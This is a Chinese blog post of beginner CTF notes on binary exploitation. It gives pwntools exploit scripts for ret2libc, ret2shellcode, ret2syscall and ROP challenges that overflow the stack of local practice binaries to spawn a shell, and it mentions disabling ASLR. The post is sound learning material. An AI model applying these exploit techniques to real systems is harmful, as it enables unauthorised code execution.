PWN入门

已于 2023-02-19 19:55:44 修改
阅读量631 收藏 2
点赞数 3
文章标签: 网络安全 python
于 2023-02-19 15:39:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44418623/article/details/129110691
版权

PWN入门

拖了好久。。。
汇编底子不是很好。。。
做逆向也有一段时间了
对操作系统也有大概了解了
现在才敢尝试一下。。。
https://www.bilibili.com/video/BV1854y1y7Ro
经大佬推荐 看这个课入的门
因此本文所有题都是跟课程一致
但exp不同,我写exp的原则是少用“魔法值”

魔法值 (会根据我看课的进度进行更新

0.0xdeadbeef 垃圾数据 避免0x00被某种原因截断
尽量不要用0x00
1.gadget 给寄存器赋值或栈平衡…

ret2libc1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

elf = ELF('./ret2libc1')

binsh = next(elf.search(b"/bin/sh"))
system = elf.symbols['system']

payload = b"A"*112 + p32(system) + p32(0) + p32(binsh)

io = process('./ret2libc1')
io.sendline(payload)

io.interactive()

ret2shellcode

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'


elf = ELF('./ret2shellcode')
#这里为什么+0x40 去ida看看就知道了
#bss = elf.bss() + 0x40
bss = elf.symbols['buf2']

io = process('./ret2shellcode')

shellcode = asm(shellcraft.sh())
io.recvuntil(b'!!!')
#payload = shellcode.ljust(112, b'\x00') + p32(bss)
payload = shellcode + b'\x00'*(112-len(shellcode)) + p32(bss)
io.sendline(payload)

io.interactive()

ret2syscall

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
# context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2syscall')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = next(elf.search(b"/bin/sh"))

io = process('./ret2syscall')

payload = p32(pop_eax_ret) + p32(0xb) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(binsh) + p32(int_0x80)
payload = b"A"*112 + payload

io.sendline(payload)

io.interactive()

ret2libc2

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2libc2')

# bss = elf.bss() + 0x40
buf2 = elf.symbols['buf2']
gets = elf.symbols['gets']
system = elf.symbols['system']


binsh = b"/bin/sh\x00"

payload = b"A"*112

# pop_ebx_ret = 0x0804843d
# payload += p32(gets)
# payload += p32(pop_ebx_ret)
# payload += p32(buf2)

# payload += p32(system)
# payload += p32(0)
# payload += p32(buf2)
#============================
payload += p32(gets)
payload += p32(system)
payload += p32(buf2)
payload += p32(buf2)

io = process('./ret2libc2')

io.sendline(payload)
# gdb.attach(io)
# pause()
io.sendline(binsh)

io.interactive()

ret2libc3

注意
io.sendline(str(elf.got['puts']).encode())
这里不能去用symbols
原因symbols找到的是plt地址
got才是got地址

只能填充deadbeef 因此由strcpy造成的溢出不要有0x00

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
# context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2libc3')
so = ELF('./libc-2.27.so')
print(elf.got['puts'])
io = process(['./ld-2.27.so','./ret2libc3'], env={"LD_PRELOAD":"./libc-2.27.so"})
io.recv()

io.sendline(str(elf.got['puts']).encode())
io.recvuntil(b": ")
io_puts = io.recvuntil(b'\n', drop=True)
io_puts = int(io_puts[2:], 16)

libc_base = io_puts - so.symbols['puts']

system = libc_base + so.symbols[b'system']
binsh = libc_base + next(so.search(b"/bin/sh\x00"))

payload = b"A"*60 + p32(system) + p32(0xdeadbeef) + p32(binsh)

io.sendlineafter(b':', payload)

io.interactive()

pwn0

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'

elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']
ret = 0x0000000000400431

io = process('./level0')
io.recvuntil(b'World\n')

payload = b'A' * 0x88 +p64(ret) + p64(callsys_addr)
# payload = b'A' * 0x88 + p64(callsys_addr) 
# Ubuntu18 x64的环境 需要栈平衡因此需要gadget
io.send(payload)

io.interactive()

pwn1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

shellcode = asm(shellcraft.sh())
io = process('./level1')

buf_addr = int(io.recvline()[14: -2], 16)

payload = shellcode + b'\x00' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()

pwn2

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

elf = ELF('./level2')
system = elf.symbols['system']
binsh = next(elf.search(b'/bin/sh'))

payload = b'a' * (0x88 + 0x4) + p32(system) + p32(0xdeadbeef) + p32(binsh)

io = process('./level2')
io.sendlineafter(b"Input:\n", payload)

io.interactive()

pwn2_x64

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

#64位参数顺序 rdi rsi rdx rcx r8 r9 其余参数从右往左压栈

elf = ELF("./level2_x64")
binsh = next(elf.search(b"/bin/sh\x00"))
system = elf.symbols["system"]
pop_rdi_ret = 0x00000000004006b3
ret = 0x00000000004004a1

io = process("./level2_x64")
io.recvline()
payload=b'A'*0x80 + b"A"*8 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)
io.send(payload)
io.interactive()

pwn3

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

io = process("./level3")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
elf=ELF('./level3')

vulfun_addr=elf.symbols['vulnerable_function']
write_plt=elf.symbols['write'] 
write_got=elf.got['write'] 

# 相当于调用write(1,write_got,4) 把write_got的值写到标准输出 最后再调用vulfun
# 其中 p32(write_plt)+p32(0xdeadbeef) 现在换成vulfun_addr 为了再次调用vulfun
payload1=b'A'*(0x88+4)+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)

io.recvuntil(b"Input:\n")
io.sendline(payload1)

write_addr=u32(io.recv()[:4])

libc_write=libc.symbols['write']
libc_base = write_addr - libc_write

system=libc_base+libc.symbols['system'] 
binsh=libc_base+next(libc.search(b'/bin/sh'))

#第二次栈溢出
payload2=b'A'*(0x88+4)+p32(system)+p32(0xdeadbeef)+p32(binsh)

io.sendline(payload2)

io.interactive()

pwn3_x64

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

io = process("./level3_x64")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./level3_x64')

vulfun_addr=elf.symbols['vulnerable_function']
write_plt=elf.symbols['write'] 
write_got=elf.got['write'] 

# 64位参数顺序 rdi rsi rdx rcx r8 r9 其余参数从右往左压栈
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
ret = 0x0000000000400499

#没有考虑pop rdx 是因为没有 gdb能看到 rdx的值为200 够用了
payload1 = b'A'*(0x80+8) + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(write_plt) + p64(vulfun_addr)

io.recvuntil(b"Input:\n")
io.sendline(payload1)

write_addr=u64(io.recv()[:8])

libc_write=libc.symbols['write']
libc_base = write_addr - libc_write

system=libc_base+libc.symbols['system'] 
binsh=libc_base+next(libc.search(b'/bin/sh'))

#第二次栈溢出
payload2=b'A'*(0x80+8)+p64(pop_rdi_ret)+p64(binsh)+p64(system)

io.sendline(payload2)

io.interactive()
247533
关注
小白初学pwn(一)
小明的小书包Ya
09-12 2011
小白初学pwn 安装pwntools pip install pwntools 坑:最好使用Python2版本去运行你的脚本 进入Python交互环境测试一下我们的pwn是否安装好了 ⚡ root@kncc  /work/ctf/pwn-demo  python Python 2.7.15+ (default, Aug 31 2018, 11:56:52) [GCC 8.2.0...
python安装pwn_Linux pwn入门教程(0)——环境配置
weixin_34413579的博客
02-10 844
作者:Tangerine@SAINTSEC0x00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程中的技...
warmup pwn入门
02-11
pwn入门
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3067
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
pwn入门】使用python打二进制
Think++
10-27 473
【代码】【pwn入门】使用python打二进制。
python安装pwn_PWN入门入门——工具安装
weixin_39866874的博客
12-21 1105
安装pwntool:命令行运行:1 pip install pwntools1 python2 importpwn3 pwn.asm("xor eax,eax")出现'1\xc0'说明安装成功在pycharm中运行出错:_curses.error: must call (at least) setupterm() first解决方案:https://stackoverflow.com/quest...
PWN基础工具安装
qq_60737948的博客
10-04 372
工欲善其事必先利其器,pwn基础工具的安装
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
welpwn pwn 入门
02-11
pwn 入门
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 1030
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
2018第四届百越杯CTF总结-pwn(附带python调用gdb小技巧)
qq_35661990的博客
12-20 1701
这次做了一题逆向和pwn,不过做出的逆向太简单了就不多说了,倒是借着两题最基础的pwn题好好学习了一下ret2lib和ret2plt,以及格式化字符串漏洞。只是写payload的话,照着ctf wiki上的改几个地址就可以了。 Boring game 考察基础的ret2libc和ret2plt,在google上找到一篇把ret2libc基础讲得很好的文章 https://www.shellb...
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 2659
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
python安装pwn_CTF-Pwn-[BJDCTF 2nd] r2t3
weixin_42523792的博客
01-04 185
CTF-Pwn-[BJDCTF 2nd] r2t3博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd] r2t3下载题目的文件R2t3思路使用file命令查看,发现是32位的文件,使用ida...
Pwn环境配置】kali安装python2,python3,pip2,pip3及pwntools
weixin_62621015的博客
04-14 2555
因为最近开始学习pwn,我写的脚本需要再python2环境下运行,而pwn库安装在python3,所以需要在python2下载pwntools,过程中遇到了许多问题,特此记录下来方便后续查看。
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3332
PWN 二进制漏洞审计
Pwn 环境安装
潜心习安全
10-30 3305
Pwn 环境安装教程
pwn入门教程--0x01(必备知识)
qq_39772215的博客
02-05 944
pwn入门教程–0x01(必备知识) • Binary Exploitation • Pwn即Binary Exploitation,就是利用二进制漏洞来达到控制程序的工作流程(Control Flow) • 其目的就在于获得程序的控制权从而来控制程序所在主机 • Binary Format 即二进制文件的格式,如下: • 在Linux上叫做ELF(Executable and Linking Format)文件 • 组成部分分为 ·rodata:read only data(只读数据) ·data:数据节
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,我们需要先修改/proc/sys/kernel/randomize_va_space文件的内容为0,然后运行pwn文件,即可得到正确的flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值